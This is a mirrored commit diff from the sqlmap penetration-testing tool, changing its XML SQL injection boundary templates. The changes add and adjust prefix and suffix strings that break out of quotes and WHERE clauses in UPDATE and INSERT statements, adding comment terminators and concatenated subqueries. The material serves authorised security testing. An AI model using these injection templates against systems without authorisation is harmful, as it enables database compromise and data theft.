mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-01-24 16:24:25 +03:00
improved detection for INSERT and UPDATE statements
This commit is contained in:
Bernardo Damele
parent
11546cdb6e
commit
049c27c739
|
|
@ -451,12 +451,12 @@ Formats:
|
||||||
|
|
||||||
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
|
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
|
||||||
<boundary>
|
<boundary>
|
||||||
<level>4</level>
|
<level>5</level>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>1</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix></suffix>
|
<suffix>-- AND ('[RANDSTR]'='[RANDSTR]</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
|
@ -464,8 +464,17 @@ Formats:
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix></suffix>
|
<suffix>-- AND ("[RANDSTR]"="[RANDSTR]</suffix>
|
||||||
|
</boundary>
|
||||||
|
|
||||||
|
<boundary>
|
||||||
|
<level>4</level>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1,2</where>
|
||||||
|
<ptype>1</ptype>
|
||||||
|
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
|
<suffix>-- AND ([RANDNUM1]=[RANDNUM1]</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
|
@ -474,7 +483,7 @@ Formats:
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix></suffix>
|
<suffix>-- AND '[RANDSTR]'='[RANDSTR]</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
|
@ -483,7 +492,16 @@ Formats:
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>4</ptype>
|
<ptype>4</ptype>
|
||||||
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix></suffix>
|
<suffix>-- AND "[RANDSTR]"="[RANDSTR]</suffix>
|
||||||
|
</boundary>
|
||||||
|
|
||||||
|
<boundary>
|
||||||
|
<level>4</level>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1,2</where>
|
||||||
|
<ptype>1</ptype>
|
||||||
|
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
|
<suffix>-- AND [RANDNUM1]=[RANDNUM1]</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
<!-- End of pre-WHERE generic boundaries -->
|
<!-- End of pre-WHERE generic boundaries -->
|
||||||
|
|
||||||
|
|
@ -493,8 +511,8 @@ Formats:
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix> || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>||(SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>) ||</suffix>
|
<suffix>)||</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
|
@ -502,8 +520,8 @@ Formats:
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>|| (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>) ||</suffix>
|
<suffix>)||</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
|
@ -511,8 +529,8 @@ Formats:
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>' || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>'||(SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>) || '</suffix>
|
<suffix>)||'</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
|
@ -520,8 +538,8 @@ Formats:
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>' || (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>'||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>) || '</suffix>
|
<suffix>)||'</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
|
@ -529,7 +547,7 @@ Formats:
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<ptype>1</ptype>
|
<ptype>1</ptype>
|
||||||
<prefix> + (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>+(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>)</suffix>
|
<suffix>)</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
|
|
@ -538,8 +556,8 @@ Formats:
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>' + (SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>) + '</suffix>
|
<suffix>)+'</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
<!-- End of INSERT/UPDATE generic boundaries -->
|
<!-- End of INSERT/UPDATE generic boundaries -->
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user